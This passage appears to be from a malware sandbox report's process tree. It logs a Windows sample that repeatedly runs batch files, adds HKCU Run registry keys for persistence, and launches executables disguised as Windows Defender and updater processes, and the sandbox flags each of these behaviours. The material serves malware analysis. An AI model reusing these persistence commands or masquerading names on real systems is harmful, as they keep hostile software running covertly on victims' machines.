C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f71⤵PID:2308
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"71⤵PID:4068
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"72⤵PID:3368
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"71⤵
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"71⤵PID:1572
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\58E9.tmp\58EA.tmp\58EB.bat C:\Windows\system32\java.exe"72⤵PID:2296
-
C:\Windows\system32\timeout.exetimeout 173⤵PID:3384
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f73⤵PID:3944
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f73⤵PID:1504
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f73⤵PID:2580
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f73⤵PID:2784
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"73⤵PID:4020
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"74⤵PID:3988
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"73⤵
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"73⤵PID:4004
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C91.tmp\5C92.tmp\5C93.bat C:\Windows\system32\java.exe"74⤵
- Drops file in System32 directory
PID:3172 -
C:\Windows\system32\timeout.exetimeout 175⤵
- Delays execution with timeout.exe
PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f75⤵
- Adds Run key to start application
PID:3912
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f75⤵PID:3228
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f75⤵
- Adds Run key to start application
PID:3260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f75⤵PID:3264
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"75⤵PID:2084
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"76⤵PID:3688
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"75⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"75⤵PID:3824
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6059.tmp\605A.tmp\605B.bat C:\Windows\system32\java.exe"76⤵PID:2864
-
C:\Windows\system32\timeout.exetimeout 177⤵
- Delays execution with timeout.exe
PID:3212
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f77⤵PID:2908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f77⤵PID:3028
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f77⤵PID:3964
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f77⤵PID:2868
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"77⤵PID:3716
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"78⤵PID:2180
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"77⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"77⤵PID:3892
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\649D.tmp\649E.tmp\649F.bat C:\Windows\system32\java.exe"78⤵
- Drops file in System32 directory
PID:2576 -
C:\Windows\system32\timeout.exetimeout 179⤵PID:1528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f79⤵PID:1708
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f79⤵
- Adds Run key to start application
PID:3100
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f79⤵PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f79⤵PID:3828
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"79⤵PID:3996
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"80⤵PID:1536
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"79⤵
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"79⤵PID:1780
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6835.tmp\6836.tmp\6847.bat C:\Windows\system32\java.exe"80⤵PID:1232
-
C:\Windows\system32\timeout.exetimeout 181⤵PID:3644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f81⤵PID:2188
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f81⤵PID:3728
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f81⤵PID:3700
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f81⤵
- Adds Run key to start application
PID:3696
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"81⤵PID:3436
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"82⤵PID:3804
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"81⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"81⤵PID:3292
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C3B.tmp\6C3C.tmp\6C3D.bat C:\Windows\system32\java.exe"82⤵
- Drops file in System32 directory
PID:3888 -
C:\Windows\system32\timeout.exetimeout 183⤵
- Delays execution with timeout.exe
PID:4012
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f83⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f83⤵PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f83⤵PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f83⤵PID:2492
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"83⤵PID:2972
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"84⤵PID:2364
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"83⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"83⤵PID:2956
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7040.tmp\7041.tmp\7042.bat C:\Windows\system32\java.exe"84⤵PID:4088
-
C:\Windows\system32\timeout.exetimeout 185⤵PID:3328
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f85⤵PID:3144
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f85⤵PID:2260
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f85⤵PID:3624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f85⤵PID:3200
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"85⤵PID:3896
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"86⤵PID:3708
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"85⤵
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"85⤵PID:3244
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7427.tmp\7428.tmp\7429.bat C:\Windows\system32\java.exe"86⤵PID:2720
-
C:\Windows\system32\timeout.exetimeout 187⤵PID:1680
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f87⤵PID:3780
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f87⤵PID:3616
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f87⤵PID:4064
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f87⤵PID:3256
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"87⤵PID:3628
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"88⤵PID:1936
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"87⤵
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"87⤵PID:2296
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\77FD.tmp\780E.tmp\780F.bat C:\Windows\system32\java.exe"88⤵
- Drops file in System32 directory
PID:3520 -
C:\Windows\system32\timeout.exetimeout 189⤵PID:1932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f89⤵
- Adds Run key to start application
PID:2028
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f89⤵PID:3088
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f89⤵PID:3920
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f89⤵PID:3172
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"89⤵PID:4004
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"90⤵PID:1356
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"89⤵
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"89⤵PID:3144
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7BC5.tmp\7BC6.tmp\7BC7.bat C:\Windows\system32\java.exe"90⤵
- Drops file in System32 directory
PID:3496 -
C:\Windows\system32\timeout.exetimeout 191⤵PID:2776
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f91⤵
- Adds Run key to start application
PID:3780
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f91⤵PID:3616
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f91⤵PID:4064
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f91⤵PID:3256
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"91⤵PID:3164
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"92⤵PID:3380
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"91⤵
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"91⤵PID:4072
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FFA.tmp\7FFB.bat C:\Windows\system32\java.exe"92⤵
- Drops file in System32 directory
PID:3004 -
C:\Windows\system32\timeout.exetimeout 193⤵
- Delays execution with timeout.exe
PID:4008
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f93⤵
- Adds Run key to start application
PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f93⤵PID:3304
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f93⤵PID:4080
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f93⤵PID:2168
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"93⤵PID:2580
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"94⤵PID:3912
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"93⤵
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"93⤵PID:2748
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\83A1.tmp\83A2.tmp\83B3.bat C:\Windows\system32\java.exe"94⤵
- Drops file in System32 directory
PID:3712 -
C:\Windows\system32\timeout.exetimeout 195⤵PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f95⤵
- Adds Run key to start application
PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f95⤵PID:3540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f95⤵PID:2472
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f95⤵
- Adds Run key to start application
PID:3228
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"95⤵PID:3300
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"96⤵PID:4076
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"95⤵
- Suspicious use of AdjustPrivilegeToken
PID:3608
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"95⤵PID:3432
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8778.tmp\8779.tmp\877A.bat C:\Windows\system32\java.exe"96⤵PID:4000
-
C:\Windows\system32\timeout.exetimeout 197⤵
- Delays execution with timeout.exe
PID:4036
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f97⤵PID:3600
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f97⤵PID:3544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f97⤵PID:3668
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f97⤵PID:1544
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"97⤵PID:3420
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"98⤵PID:3156
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"97⤵PID:3828
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"97⤵PID:2408
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8B6E.tmp\8B6F.tmp\8B70.bat C:\Windows\system32\java.exe"98⤵
- Drops file in System32 directory
PID:2244 -
C:\Windows\system32\timeout.exetimeout 199⤵
- Delays execution with timeout.exe
PID:3136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f99⤵PID:3876
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f99⤵PID:2144
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f99⤵PID:3880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f99⤵
- Adds Run key to start application
PID:3560
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"99⤵PID:3516
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"100⤵PID:344
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"99⤵PID:3936
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"99⤵PID:3632
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F35.tmp\8F36.tmp\8F37.bat C:\Windows\system32\java.exe"100⤵PID:3604
-
C:\Windows\system32\timeout.exetimeout 1101⤵PID:3100
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f101⤵PID:3992
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f101⤵PID:3288
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f101⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f101⤵PID:3228
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"101⤵PID:2472
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"102⤵PID:1048
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"101⤵PID:3576
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"101⤵PID:3384
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\931B.tmp\931C.tmp\931D.bat C:\Windows\system32\java.exe"102⤵PID:2348
-
C:\Windows\system32\timeout.exetimeout 1103⤵
- Delays execution with timeout.exe
PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f103⤵
- Adds Run key to start application
PID:3232
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f103⤵PID:2608
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f103⤵PID:2540
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f103⤵
- Adds Run key to start application
PID:2196
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"103⤵PID:2248
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"104⤵PID:1680
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"103⤵PID:3452
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"103⤵PID:4064
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9750.tmp\9751.tmp\9752.bat C:\Windows\system32\java.exe"104⤵PID:3756
-
C:\Windows\system32\timeout.exetimeout 1105⤵PID:3496
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f105⤵PID:3196
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f105⤵
- Adds Run key to start application
PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f105⤵PID:3892
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f105⤵PID:1972
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"105⤵PID:3132
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"106⤵PID:3480
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"105⤵PID:3520
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"105⤵PID:3456
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9B17.tmp\9B18.tmp\9B19.bat C:\Windows\system32\java.exe"106⤵
- Drops file in System32 directory
PID:3224 -
